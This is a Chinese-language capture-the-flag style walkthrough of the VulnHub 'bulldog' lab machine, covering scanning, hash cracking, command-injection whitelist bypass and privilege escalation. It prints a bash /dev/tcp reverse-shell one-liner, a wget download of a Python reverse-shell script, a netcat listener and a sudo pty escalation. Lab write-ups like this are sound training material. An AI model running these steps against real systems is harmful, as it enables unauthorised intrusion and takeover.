kali滲透綜合靶機(二)--bulldog靶機
靶機下載地址:https://download.vulnhub.com/bulldog/bulldog.ova
一、主機發現
netdiscover -i eth0 -r 192.168.10.0/24
二、端口掃描
masscan --rate=10000 -p0-65535 192.168.10.154
三、服務識別
nmap -sV 192.168.10.154 -p23,8080,80
四、發現服務漏洞並利用
1.瀏覽器訪問http://192.168.10.152
2.目錄掃描
3.發現http://192.168.10.154/admin/login,嘗試弱口令登錄,失敗
4.發現http://192.168.10.154/dev/,然后訪問,查看頁面源碼,可以看到注釋有MD5的字符串,嘗試解密,解密出來bulldog bulldoglover
5.嘗試使用郵箱用戶名登錄,失敗,嘗試用郵箱的開頭,成功登錄
6.發現http://192.168.10.154/dev/shell/ 訪問
5.1發現可能存在命令執行漏洞,嘗試輸入一些系統命令,發現對命令做了白名單限制,只允許給出的命令
嘗試使用;執行多個命令,“;”被過濾失敗,嘗試使用&,&&,|等方式執行多個命令,成功
5.2經過嘗試,存在命令執行漏洞
5.3之前服務識別發現web使用python搭建的,可以利用wget 遠程下載一個python反彈shell到目標服務器上,然后利用命令執行漏洞執行上傳到服務器的python腳本
5.3.1在遠程主機上搭建一個web站點,把python反彈shell腳本放入
或者使用echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash 反彈shell
python -m SimpleHTTPServer 80 開啟web服務
5.3.2在目標上執行ls|wget http://192.168.10.153/shell.py,遠程下載python 反彈shell腳本,
查看是否下載成功
5.3.3在遠程主機上開啟監聽 nc -nvlp 4444
5.3.4在目標上執行ls&python fantan.py,此時供給端已經成功得到目標的shell
5.3.5連接到目標的shell之后, 發現當前用戶屬於sudo組,嘗試切換賬戶失敗,需要終端
5.3.5切換到家目錄發現有個類似管理員的目錄,找到密碼
或者查找每個用戶的文件(不顯示錯誤)find / -user bulldogadmin 2>/dev/null
使用 strings打印其中的可打印字符,發現密碼
5.3.7連接到目標的shell,但是沒有反彈一個終端到攻擊端, 此時需要新建一個終端,拿到管理員權限
python -c 'import pty;pty.spawn("/bin/bash")'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
注:先用python 開啟一個終端,報錯,然后用sudo python 開啟一個終端,達到提權的目的
總結:
1.信息收集
2.頁面源碼信息泄露
3.dirb爆破目錄
4.命令執行,反彈shell,提權